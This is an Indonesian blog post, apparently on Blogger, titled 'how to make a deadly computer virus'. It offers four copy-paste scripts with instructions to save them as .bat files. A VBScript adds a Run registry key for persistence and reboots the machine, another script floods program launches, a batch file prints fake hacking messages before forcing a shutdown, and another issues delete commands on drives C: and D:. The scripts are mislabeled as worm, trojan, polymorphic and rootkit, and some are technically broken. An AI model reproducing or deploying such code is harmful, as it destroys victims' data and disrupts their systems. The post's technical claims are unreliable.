Breaking

Cara Buat Virus Komputer Yang Mematikan


Kali ini saya akan membagikan cara membuat virus yang mematikan cukup dengan notepad. Tapi kali ini saya cuma memberikan script dasar dari berbagai virus yang mematikan, jadi untuk membuat virus yang mematikan anda perlu mengembangin scriptnya lagi. Tapi walaupun kalian tidak mengembangin scriptnya, menurut saya sudah cukup mematikan virus nya ^_^

Cara Buat Virus Worm




  • Buka notepad
  • Selanjutnya Copas script di bawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)
dim x
for x = 1 to 99999999
wshshell.run “tourstart.exe”
next
  • Lalu save dengan format .bat, lalu ubah jenis file menjadi All files
  • Selesai :)

Cara Buat Virus Trojan Horses



  • Buka notepad
  • Selanjutnya Copas script di bawah ini:
rem - dlRB "DL Reboot" Trojan script by D.L
On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"
sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")
set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^
oot\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function
function rebootSystem()
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "
oot\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
  • Lalu save dengan format .bat, lalu ubah jenis file menjadi All files
  • Selesai :)

Cara Buat Virus Polymorphic



  • Buka notepad
  • Selanjutnya Copas script di bawah ini:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Hi Admin...
echo Who I am?
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo Your System Is Down...
echo:
echo:
echo We Have.../
echo Black Terminal And Green Font Color..
echo:
echo:
echo I'm Malwarebytes...
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo I'm Surfing In Your System!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo ENTE MUSTINYA INGET MEN!!!
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_gantengers_system
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo Clock Out System
echo:
echo:
echo:
echo:
echo:
echo Transmission Viruses..
start /w wscript.exe C:\sleep3000.vbs
echo Loading Virus...
echo Succes Transfer...
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo Virus Must Be Active!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Your FireWall System Are Down...
start /w wscript.exe C:\sleep2000.vbs
echo Clearing System Procces...
start /w wscript.exe C:\sleep2000.vbs
echo see you...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Down Look Back...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Good Bye...
echo Gantengers Code
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “SkyNet Neural Net Based Artificial Intelegence Gantengers System”

  • Lalu save dengan format .bat, lalu ubah jenis file menjadi All files
  • Selesai :)

Cara Buat Virus Rootkit



  • Buka notepad
  • Selanjutnya Copas script di bawah ini:
@echo off
DEL C: -Y
DEL D: -Y
  • Lalu save dengan format .bat, lalu ubah jenis file menjadi All files
  • Selesai :)

Sekian beberapa cara buat virus yang cukup mematikan, jangan lupa lihat artikel artikel menarik lainnya dari saya

No comments:

Silahkan tulis komentar anda mengenai pertanyaan dan sanggahan dari anda. Saya sangat menghargai komentar yang baik dari anda, terima kasih

Powered by Blogger.